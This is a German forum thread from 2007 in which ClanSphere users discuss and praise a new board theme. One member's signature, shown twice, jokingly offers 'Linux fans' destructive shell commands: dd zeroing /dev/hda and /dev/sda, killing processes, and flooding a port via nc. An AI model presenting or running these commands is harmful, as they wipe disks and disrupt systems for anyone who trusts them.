Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 20
Seite [1]
Nagun


Try to beat me




Herkunft: Neustadt
Beiträge: 119
# Thema - 22.06.2007 um 14:40 Uhr
Moin,

bin atm dabei ne neue Forenansicht zu machen und bin auch fast mit der Hauptseite fertig. Wenn die anderen Themes folgen mach ich das ganze fertig.

Jetzt will ich noch ein paar Verbesserungsvorschläge / Ideen von euch abrufen, hab mich bis jetzt stark am WBB gehalten da mir dies am besten gefällt (In Kombi mit den Crystal Clear Icons ein richtiger Blickfang )

Wie gesagt würde ich jetzt gern etwas Feedback abrufen um vllt noch ein wenig Verändern zu können.

Vorschau +-




------------------
Leader von www.destructive-impact.de
Inaktiv
denimator


King for a day




Herkunft: Karnabrunn
Beiträge: 306
# Antwort: 1 - 22.06.2007 um 15:39 Uhr
sehr schön ... sieht wirklich gut aus

würde Beitragszahl und Themenanzahl noch ins Hauptmenü nehmen.
auch "Letzter Beitrag" als Überschrift


------------------
mit freundlichen Grüßen - Denimator



Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 2 - 22.06.2007 um 15:41 Uhr
Was hat dieser blaue Pfeil da zu bedeuten?


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Nagun
Thread-Ersteller


Try to beat me




Herkunft: Neustadt
Beiträge: 119
# Antwort: 3 - 22.06.2007 um 15:44 Uhr
Hi,

man kommt auch hier zum "letzten aktiven Thema" -> auf meiner Seite will ich das aber soweit umbauen das man zum "neusten Beitrag" kommt und über den klick auf den Link normal zum Thema.

Dieser Wunsch wurde ja schon in nen anderen Thema abgelehnt, dawegen hätte der pfeil für den Großteil der Clansphere nutzer keinen anderen nutzen als der Link daneben


------------------
Leader von www.destructive-impact.de

Inaktiv
|
Denni


Specialist




Herkunft: Ilsfeld
Beiträge: 1972
# Antwort: 4 - 23.06.2007 um 15:20 Uhr
sehr n1ce!


------------------
Gruß
Denni

ClanSphere - Makes your website a playmate, just dress her

Inaktiv
|
FranzAUT


Going for pro




Beiträge: 467
# Antwort: 5 - 23.06.2007 um 16:53 Uhr
Gute Idee mach weiter so.
*Träummodus/AN*
Mehrere Foren Ansichten Irgendwann einmal und vieleicht auch noch vom Benutzer selbst auswählbar was will man mehr.
*Träummodus/AUS*


------------------


Inaktiv
|
Baumi


Try to beat me





Beiträge: 159
# Antwort: 6 - 23.06.2007 um 17:12 Uhr
Wenn hier schon alle beginnen zu träumen, dann will ich euch unsere neue Forenansicht natürlich nicht vorenthalten

http://www.sentic.org/neu/index.php?mod=board


------------------

Alles was das Herz begehrt: http://www.sentic.org

Counterstrike PublicServer: 80.190.77.75:27015

Inaktiv
|
racor


Going for pro




Beiträge: 476
# Antwort: 7 - 23.06.2007 um 19:06 Uhr
Die unterscheidet sich doch kein bischen von der Standardansicht, oder liege ich falsch?


------------------

ONLINE PORTFOLIO

Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 8 - 23.06.2007 um 19:14 Uhr
2007-06-23 at 5:12 PM - Baumi:
Wenn hier schon alle beginnen zu träumen, dann will ich euch unsere neue Forenansicht natürlich nicht vorenthalten

http://www.sentic.org/neu/index.php?mod=board



Und ich dachte schon ihr bleibt bis in alle Ewigkeit bei 0.2
Aber denk daran die ganzen Vids mit auf die neue seite zu nehmen


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Baumi


Try to beat me





Beiträge: 159
# Antwort: 9 - 23.06.2007 um 20:04 Uhr
23.06.2007 um 19:14 Uhr - pHaeno*:
2007-06-23 at 5:12 PM - Baumi:
Wenn hier schon alle beginnen zu träumen, dann will ich euch unsere neue Forenansicht natürlich nicht vorenthalten

http://www.sentic.org/neu/index.php?mod=board



Und ich dachte schon ihr bleibt bis in alle Ewigkeit bei 0.2
Aber denk daran die ganzen Vids mit auf die neue seite zu nehmen


Sind sie doch, oder irre ich mich?
Das Übertragen aller Downloads hätte mich fast bis an den Rand meiner Nerven gebracht, denn per Autoconvert wurden sie natürlich ganz weggelassen und das eigene Script wollte anfangs auch nicht das machen was ich mir gerne gewünscht hätte.

Weils im anderen Thread immer wieder untergegangen ist würde ich hier auch sehr gerne nochmal kurz folgende Frage loswerden: Wie kann ich unter "Home" die Anzeige "Aktuell im Forum" aktivieren?

Edit: Aktuell scheint das Script noch Probleme Mit URL zu haben hinter denen sofort ein ABcode folgt


------------------

Alles was das Herz begehrt: http://www.sentic.org

Counterstrike PublicServer: 80.190.77.75:27015

Zuletzt editiert von Baumi am 23.06.2007 um 20:05 Uhr (2x Editiert)
Inaktiv
|
Nagun
Thread-Ersteller


Try to beat me




Herkunft: Neustadt
Beiträge: 119
# Antwort: 10 - 23.06.2007 um 20:22 Uhr
So zugeklappte Foren werden gespeichert so dass bei einen weiteren aufruf oder aktualisierung des Forums nicht alles wieder zugeklappt werden muss was man zugeklappt hat ;D

thx an adva meinen alten Kollegen


------------------
Leader von www.destructive-impact.de

Inaktiv
|
Micha.09 ClanSphere Team


Specialist



Herkunft: Dortmund
Beiträge: 2860
# Antwort: 11 - 23.06.2007 um 23:24 Uhr
mmh was is denn an der ansicht groß anders, als beim standart board. ausser das es für jedes board ne eigene tabelle gibt


Inaktiv
|
Nagun
Thread-Ersteller


Try to beat me




Herkunft: Neustadt
Beiträge: 119
# Antwort: 12 - 24.06.2007 um 00:00 Uhr
Es gefällt (mir jedenfalls) besser. Es handelt sich ja hier nur um nen "theme", ist ja klar das da nix großartiges dazukommt ^^

greetz


------------------
Leader von www.destructive-impact.de

Inaktiv
|
quemao


King for a day




Herkunft: Ort Der Gem. Baustelle
Beiträge: 353
# Antwort: 13 - 24.06.2007 um 00:10 Uhr
oder doch .....

Board Ansicht


------------------



I will Thx God for giv me 10 Fingers, 2 Wonderfull Kids,

a nice Girlfriend and a lot of Bullshit !









Projekte +-


CHECK & JOIN QUEMAO DESIGNZ COMMUNITY
[-Go 2 quema0-Designz.de-]


Check my mySpace Profil
[-http://profile.myspace.com/quema0-]

Last Reference
[-Sinuhe Official Website-]




Inaktiv
|
Nagun
Thread-Ersteller


Try to beat me




Herkunft: Neustadt
Beiträge: 119
# Antwort: 14 - 24.06.2007 um 00:13 Uhr
Soviel Infos würde ich ja nie in nen Forum reinbekommen was normal in die Seite eingebunden wird XD

Aber schick schick

edit: ne kleine legende hau ich auch noch rein thx


------------------
Leader von www.destructive-impact.de

Zuletzt editiert von Nagun am 24.06.2007 um 00:14 Uhr (1x Editiert)
Inaktiv
|
rob_N


Try to beat me



Herkunft: Berlin
Beiträge: 107
# Antwort: 15 - 24.06.2007 um 00:15 Uhr
gibs denn das irgendwo? also wird das zur verfügung gestellt?


Inaktiv
|
quemao


King for a day




Herkunft: Ort Der Gem. Baustelle
Beiträge: 353
# Antwort: 16 - 24.06.2007 um 00:16 Uhr
aber du hast doch auch ne board.php ^^


------------------



I will Thx God for giv me 10 Fingers, 2 Wonderfull Kids,

a nice Girlfriend and a lot of Bullshit !









Projekte +-


CHECK & JOIN QUEMAO DESIGNZ COMMUNITY
[-Go 2 quema0-Designz.de-]


Check my mySpace Profil
[-http://profile.myspace.com/quema0-]

Last Reference
[-Sinuhe Official Website-]




Inaktiv
|
Nagun
Thread-Ersteller


Try to beat me




Herkunft: Neustadt
Beiträge: 119
# Antwort: 17 - 24.06.2007 um 00:17 Uhr
Also meine Ansicht kommt in nen Template release, was quemao macht weiss ich nicht =)

edit: jo klar hab ich die, ich mag aber lieber nen board was schön in der seite drinne is ^^


------------------
Leader von www.destructive-impact.de

Zuletzt editiert von Nagun am 24.06.2007 um 00:17 Uhr (1x Editiert)
Inaktiv
|
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 18 - 24.06.2007 um 00:17 Uhr
das von quemai gefällt mir richtig gut


------------------
www.laszlokorte.de

Inaktiv
|
rob_N


Try to beat me



Herkunft: Berlin
Beiträge: 107
# Antwort: 19 - 24.06.2007 um 11:33 Uhr
jo es hat richtig was! Also ich finde natürlich das von Nagun auch gut. Aber das von quamo is da wie ich finde noch ein tick besser!


Inaktiv
|
Neo89


Beginner




Herkunft: Kevelaer
Beiträge: 3
# Antwort: 20 - 24.06.2007 um 12:29 Uhr
Ja ist mal ein richtig geile Ansicht muss man sagen, weiter so!


Inaktiv
|
Antworten: 20
Seite [1]


Sie müssen sich registrieren, um zu antworten.